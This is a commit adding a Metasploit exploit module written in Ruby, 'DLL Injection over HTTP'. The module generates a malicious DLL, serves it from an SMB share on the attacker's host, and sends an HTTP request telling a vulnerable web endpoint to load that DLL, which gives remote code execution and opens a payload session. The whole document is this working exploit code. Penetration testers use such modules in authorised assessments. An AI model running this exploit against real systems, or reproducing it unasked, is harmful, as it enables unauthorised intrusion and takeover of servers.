Generic HTTP DLL Injection Exploit Module

Matthew Hall · Matthew Hall · commit 019056d75f65 · 2014-03-07T15:09:45.000Z
This is an example implementation of using the
Msf::Exploit::Remote::SMBFileServer module to perform
arbitrary DLL injection over SMB.
diff --git a/modules/exploits/windows/http/generic_http_dllinject.rb b/modules/exploits/windows/http/generic_http_dllinject.rb
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module
+# to perform an arbitrary DLL injection over SMB
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'DLL Injection over HTTP',
+      'Description'   => %q{
+        This is an example implementation of using the SMBFileServer module
+        to perform DLL injection over SMB via an webserver which 
+        will arbitrarily load a DLL given as an argument (Yes, these exist IRL).
+      },
+      'Author'      => [
+        'Matthew Hall <hallm@sec-1.com>',
+      ],
+      'Platform'       => 'win',
+      'Privileged'     => true,
+      'Arch'         => ARCH_X86, 
+      'References'     =>
+        [
+          [ 'URL', 'http://www.sec-1.com/blog/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => true,
+      'Platform'       => [ 'win'],
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
+      ))
+      register_options(
+        [
+          OptString.new('UNCPATH',  [false, 'Override the UNC path to use an existing SMB Server(Ex: \\\\192.168.1.1\\share\\exploit.dll)' ]),
+          OptString.new('URI',      [true,  'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]),
+          OptBool.new('StripExt',   [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]),
+        ], self.class)
+  end
+
+  def start_server 
+    if (datastore['UNCPATH'])
+      @unc = datastore['UNCPATH']
+      print_status("Remember to share the malicious DLL payload as #{@unc}")
+    else
+      print_status("Generating our malicious dll...")
+      exe = generate_payload_dll
+
+      @exe_file = rand_text_alpha(7) + ".dll"
+      @share = rand_text_alpha(5)
+
+      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      @unc = "\\\\#{my_host}\\#{@share}\\#{@exe_file}"
+      vprint_status("About to start SMB Server on: " + @unc)
+      # start_smb_server('UNC Path', 'Payload', 'Name of file to be served')
+      start_smb_server(@unc, exe, @exe_file)
+    end
+  end
+
+  def exploit
+    start_server
+    if datastore['StripExt']
+      share = "#{@unc}".gsub(/\.dll/,'')
+    else
+      share = "#{@unc}"
+    end
+    print_status("Injecting DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{share}")
+
+    sploit = datastore['URI'] 
+    sploit << share
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => sploit
+    }, 5)
+
+    handler    
+  end
+end
